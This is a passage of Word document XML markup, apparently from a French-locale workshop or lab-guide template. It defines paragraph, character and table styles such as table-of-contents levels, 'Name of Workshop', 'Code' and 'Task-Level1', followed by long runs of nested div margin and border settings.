    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1400"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1600"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NameofWorkshop">
    <w:name w:val="Name of Workshop"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NameofWorkshopChar"/>
    <w:qFormat/>
    <w:rsid w:val="00D53599"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NameofWorkshopChar">
    <w:name w:val="Name of Workshop Char"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="NameofWorkshop"/>
    <w:rsid w:val="00D53599"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mentionnonrsolue">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007B1A16"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauGrille2-Accentuation1">
    <w:name w:val="Grid Table 2 Accent 1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="006B22E6"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="2" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:insideH w:val="single" w:sz="2" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:insideV w:val="single" w:sz="2" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="2" w:space="0" w:color="4EB0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4FF" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C4E4FF" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00ED0AD7"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      <w:spacing w:before="180" w:after="120" w:line="220" w:lineRule="exact"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="MS Mincho" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00ED0AD7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Task-Level1">
    <w:name w:val="Task-Level1"/>
    <w:basedOn w:val="Corpsdetexte"/>
    <w:link w:val="Task-Level1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00ED0AD7"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="80" w:after="160" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Task-Level1Char">
    <w:name w:val="Task-Level1 Char"/>
    <w:basedOn w:val="CorpsdetexteCar"/>
    <w:link w:val="Task-Level1"/>
    <w:rsid w:val="00ED0AD7"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Corpsdetexte">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CorpsdetexteCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED0AD7"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CorpsdetexteCar">
    <w:name w:val="Corps de texte Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Corpsdetexte"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED0AD7"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuationlgre">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="006F64E8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="676767"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02167">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="94450453">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="936599722">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="21706700">
              <w:marLeft w:val="-1350"/>
              <w:marRight w:val="-1350"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="6687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15181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="123618936">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="432439088">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="648678421">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="702704947">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="952593122">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="128480817">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="471139767">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="868834818">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="878779995">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1202980969">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1821652572">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="171531679">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="283657463">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="313486859">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="449787298">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="65885637">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="1650"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1320037366">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1011764682">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="772630123">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1857229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93629">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="422380805">
          <w:marLeft w:val="274"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="60"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="991829287">
          <w:marLeft w:val="274"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="60"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1559393700">
          <w:marLeft w:val="274"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="60"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="431048756">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="548340070">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="555317128">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="595211320">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="639657181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="673921698">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="738525659">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="803961822">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="848713243">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="853572001">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="196088705">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="710493360">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="897715203">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1055351591">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1114984268">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
